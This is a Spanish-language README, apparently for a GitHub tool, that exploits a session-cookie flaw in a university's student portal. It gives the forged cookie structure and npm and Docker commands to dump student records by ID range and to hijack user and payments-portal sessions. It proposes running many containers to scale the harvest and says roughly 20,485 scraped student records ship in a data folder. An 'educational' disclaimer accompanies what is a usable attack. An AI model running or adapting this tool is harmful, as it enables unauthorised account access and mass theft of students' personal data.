Caution
Este script fue creado con fines educativos,en ningun momento se pretende hacer daño a la universidad o a su portal web al contrario se pretende ayudar a mejorar la seguridad de la misma.
Script que permite obtener la información de estudiantes y la sesion de un usuario en el portal de la universidad.
La vunerabilidad consiste en manipular la cookie de una session para obtener la informacion de un usuario sin necesidad de logearse en el portal de la universidad.
la estructura de cookie es la siguiente:
{
".ASPXAUTH": "puede ser cualquier sesion",
"ASP.NET_SessionId": "id de la session del autenticacion",
"CodigoUsuario": "codigo del usuario",
"usuario": "nombre del usuario",
}- Node.js v20.0.0
git clone https://github.com/epmyas2022/uped-vunerabilidad.gitnpm installConfigurar las variables de entorno en el archivo .env
ASPXAUTH=#de cualquier sesion
SESSION_ID=#id de la session del autenticacion
ARGS=#argumentos para el navegadorObtener la informacion del expediente de los estudiantes basados en un rango x1 a x2
npm run general <x1> <x2> [optional | Boolean] <headless>Obtener la sesion de un usuario
npm run login <user> <codigo>Obtener la sesion del portal de pagos de un estudiante
npm run pagos <user> <codigo>Esto es util para ejecutar el script en un contenedor docker, podriamos ejecutar x cantidad de contenedores para obtener la informacion de los estudiantes.
Construir la imagen (builder)
docker build -f .docker/Dockerfile --target builder -t uped-vunerabilidad .Construir el contenedor
docker run -it -d -e ASPXAUTH=token -e SESSION_ID=id -e FROM=desde -e TO=hasta --privileged --security-opt seccomp=.docker/chrome.json uped-vunerabilidadDentro de la carpeta data se encuentra varios datos con que se comprobo la vulnerabilidad del portal de la universidad. estos datos obtenidos fueron mediante el script aprovechando la vulnerabilidad. en total existen aproximadamente 20,485 registros de estudiantes.